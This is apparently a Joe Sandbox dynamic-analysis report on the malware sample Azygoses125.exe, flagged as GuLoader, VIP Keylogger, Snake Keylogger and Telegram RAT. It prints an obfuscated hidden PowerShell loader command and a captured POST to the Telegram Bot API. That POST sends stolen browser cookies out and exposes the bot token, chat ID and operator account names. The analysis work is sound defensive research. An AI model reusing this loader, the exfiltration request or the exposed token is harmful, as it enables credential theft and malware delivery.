2024-12-23 20:51:37 UTC	358	OUT	POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd24d391d1b18f Host: api.telegram.org Content-Length: 1265
2024-12-23 20:51:37 UTC	1265	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 64 33 39 31 64 31 62 31 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 32 37 35 33 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 33 2f 31 32 2f 32 30 Data Ascii: --------------------------8dd24d391d1b18fContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:927537Date and Time: 23/12/20
2024-12-23 20:51:38 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 23 Dec 2024 20:51:38 GMT Content-Type: application/json Content-Length: 555 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-23 20:51:38 UTC	555	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 34 35 37 35 31 39 31 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 70 61 63 68 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 68 69 6e 65 6c 6f 32 32 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 36 39 35 30 36 31 39 37 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 69 6e 65 6c 6f 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 49 66 65 62 75 63 68 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 69 7a 7a 69 5f 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 39 38 37 30 39 38 2c Data Ascii: {"ok":true,"result":{"message_id":1665,"from":{"id":7745751910,"is_bot":true,"first_name":"Apache","username":"Chinelo22bot"},"chat":{"id":7695061973,"first_name":"Chinelo","last_name":"Ifebuche","username":"alizzi_22","type":"private"},"date":1734987098,

Target ID:	3
Start time:	15:50:12
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\Azygoses125.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Azygoses125.exe"
Imagebase:	0x400000
File size:	765'176 bytes
MD5 hash:	723E8D7420209E5658D32EBEAEA45B9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:50:14
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Okkupationers=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Gascon.Som';$Indyndendes=$Okkupationers.SubString(74357,3);.$Indyndendes($Okkupationers) "
Imagebase:	0x60000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1530729050.0000000008D47000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:50:14
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:05:32
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xfa0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.4%
Total number of Nodes:	1357
Total number of Limit Nodes:	45

Executed Functions

Function 004033B6 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004033D8
GetVersion.KERNEL32 ref: 004033DE
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040342E
OleInitialize.OLE32(00000000), ref: 00403435
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403451
GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 00403466
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Azygoses125.exe",00000000), ref: 00403479
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Azygoses125.exe",00000020), ref: 004034A0

Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586

GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\), ref: 004035DB
GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004035EC
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004035F8
GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040360C
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403614
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403625
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040362D
DeleteFileW.KERNELBASE(1033), ref: 00403641

Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190

OleUninitialize.OLE32(?), ref: 0040370C
ExitProcess.KERNEL32 ref: 0040372E
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Azygoses125.exe",00000000,?), ref: 00403741
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A328,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Azygoses125.exe",00000000,?), ref: 00403750
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Azygoses125.exe",00000000,?), ref: 0040375B
lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Azygoses125.exe",00000000,?), ref: 00403767
SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403783
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 004037DD
CopyFileW.KERNEL32(C:\Users\user\Desktop\Azygoses125.exe,00420F08,00000001), ref: 004037F1
CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 0040381E
GetCurrentProcess.KERNEL32(00000028,?), ref: 0040384D
OpenProcessToken.ADVAPI32(00000000), ref: 00403854
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403869
AdjustTokenPrivileges.ADVAPI32 ref: 0040388C
ExitWindowsEx.USER32(00000002,80040002), ref: 004038B1
ExitProcess.KERNEL32 ref: 004038D4

Strings

TEMP, xrefs: 00403620
UXTHEME, xrefs: 004033FD
~nsu, xrefs: 00403739
.tmp, xrefs: 00403755
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 004036E9
TMP, xrefs: 00403628
Low, xrefs: 0040360E
"C:\Users\user\Desktop\Azygoses125.exe", xrefs: 0040346C, 00403472, 00403669
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 004035BE, 004036DE, 00403789, 00403793
Error launching installer, xrefs: 004036C3
C:\Users\user\Desktop\Azygoses125.exe, xrefs: 004037EC
\Temp, xrefs: 004035F2
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033CC
USERENV, xrefs: 00403407
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004035D0, 004035D5, 004035EB, 004035F7, 00403606, 00403613, 0040361F, 00403627, 0040373E, 0040374F, 0040375A, 00403766, 00403773, 00403782, 00403833
NSIS Error, xrefs: 00403457
SeShutdownPrivilege, xrefs: 00403863
SETUPAPI, xrefs: 00403411
1033, xrefs: 0040363C
C:\Users\user\Desktop, xrefs: 00403760, 00403765, 00403792

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\Azygoses125.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$C:\Users\user\AppData\Local\magmaet\clenched$C:\Users\user\Desktop$C:\Users\user\Desktop\Azygoses125.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-2484012106
Opcode ID: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
Instruction ID: 382b60f40ca78a79eaa77c6fd6579f97e3273799caf5780a05f3f86dc88dff68
Opcode Fuzzy Hash: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
Instruction Fuzzy Hash: 1DD11771200300BBD7207F659D09A2B3EADEB4070AF15843FF885B62D2DB7D9956876E

Function 00405421 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040547F
GetDlgItem.USER32(?,000003EE), ref: 0040548E
GetClientRect.USER32(?,?), ref: 004054CB
GetSystemMetrics.USER32(00000002), ref: 004054D2
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F3
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405504
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405517
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405525
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405538
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555A
ShowWindow.USER32(?,00000008), ref: 0040556E
GetDlgItem.USER32(?,000003EC), ref: 0040558F
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559F
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B8
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C4
GetDlgItem.USER32(?,000003F8), ref: 0040549D

Part of subcall function 0040427C: SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A

GetDlgItem.USER32(?,000003EC), ref: 004055E1
CreateThread.KERNELBASE(00000000,00000000,Function_000053B5,00000000), ref: 004055EF
CloseHandle.KERNELBASE(00000000), ref: 004055F6
ShowWindow.USER32(00000000), ref: 0040561A
ShowWindow.USER32(?,00000008), ref: 0040561F
ShowWindow.USER32(00000008), ref: 00405669
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040569D
CreatePopupMenu.USER32 ref: 004056AE
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C2
GetWindowRect.USER32(?,?), ref: 004056E2
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FB
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405733
OpenClipboard.USER32(00000000), ref: 00405743
EmptyClipboard.USER32 ref: 00405749
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405755
GlobalLock.KERNEL32(00000000), ref: 0040575F
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
GlobalUnlock.KERNEL32(00000000), ref: 00405793
SetClipboardData.USER32(0000000D,00000000), ref: 0040579E
CloseClipboard.USER32 ref: 004057A4

Strings

H7B, xrefs: 0040570F
{, xrefs: 00405687

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
Instruction ID: 2c7cb92300b087b9ae130e103e133312d6144c84674811722de124f1f1f34f09
Opcode Fuzzy Hash: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
Instruction Fuzzy Hash: 16B13770900608FFDF119F60DD899AE7B79FB08354F40847AFA45A62A0CB758E52DF68

Function 004061A5 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 00406268
GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004062E6
GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004062F9
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406335
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406343
CoTaskMemFree.OLE32(?), ref: 0040634E
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406372
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 004063CC

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004062B4
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040636C
: Completed, xrefs: 004061CF, 004062AF, 004062D0, 004062E5, 004062F8, 00406314, 0040633F, 00406371, 00406377, 00406391, 004063A5, 004063C5, 004063CB, 004063D7, 0040640A
Completed, xrefs: 004061CA

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-905382516
Opcode ID: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
Instruction ID: 0f73e779dd6c4db66e797802c36dad016b528f10de9f6072c808280cb7245e7c
Opcode Fuzzy Hash: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
Instruction Fuzzy Hash: 9361F271A00105EBDB209F25CD41AAE37A5AF50314F16807FFD46BA2D0D73D89A2CB9D

Function 00405974 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Azygoses125.exe"), ref: 0040599D
lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Azygoses125.exe"), ref: 004059E5
lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Azygoses125.exe"), ref: 00405A08
lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Azygoses125.exe"), ref: 00405A0E
FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Azygoses125.exe"), ref: 00405A1E
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,0000002E), ref: 00405ABE
FindClose.KERNEL32(00000000), ref: 00405ACD

Strings

"C:\Users\user\Desktop\Azygoses125.exe", xrefs: 0040597D
\*.*, xrefs: 004059DF
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405A5E
PWB, xrefs: 004059CD

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Azygoses125.exe"$Error writing temporary file. Make sure your temp folder is valid.$PWB$\*.*
API String ID: 2035342205-353044309
Opcode ID: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
Instruction ID: d49c34b76256c1d29f4337415f4183e275b3e80d30968624801757685f99445f
Opcode Fuzzy Hash: 03fd1591811734580f28d43f6b2dd8bf165791cda161b7166c14a59216ccda8d
Instruction Fuzzy Hash: E041B130A00A14EADB21AB618D89BAF7778DF41764F20427FF805B51D2D77C5982CE6E

Function 00406847 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
Instruction ID: 5555e847f210990d4306c473702a26b4278c0affe79ec1256b97cb42bd71170f
Opcode Fuzzy Hash: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
Instruction Fuzzy Hash: 60F17671D04229CBCF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7785A86CF45

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00402154

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\magmaet\clenched
API String ID: 542301482-3268208382
Opcode ID: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
Instruction ID: 385f74efd5c92971cc76d3b11bce30356dc3a3525802f9592d77ec9fc6b050a7
Opcode Fuzzy Hash: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
Instruction Fuzzy Hash: E5412C75A00209AFCF00DFA4CD88AAD7BB5FF48314B20457AF915EB2D1DBB99A41CB54

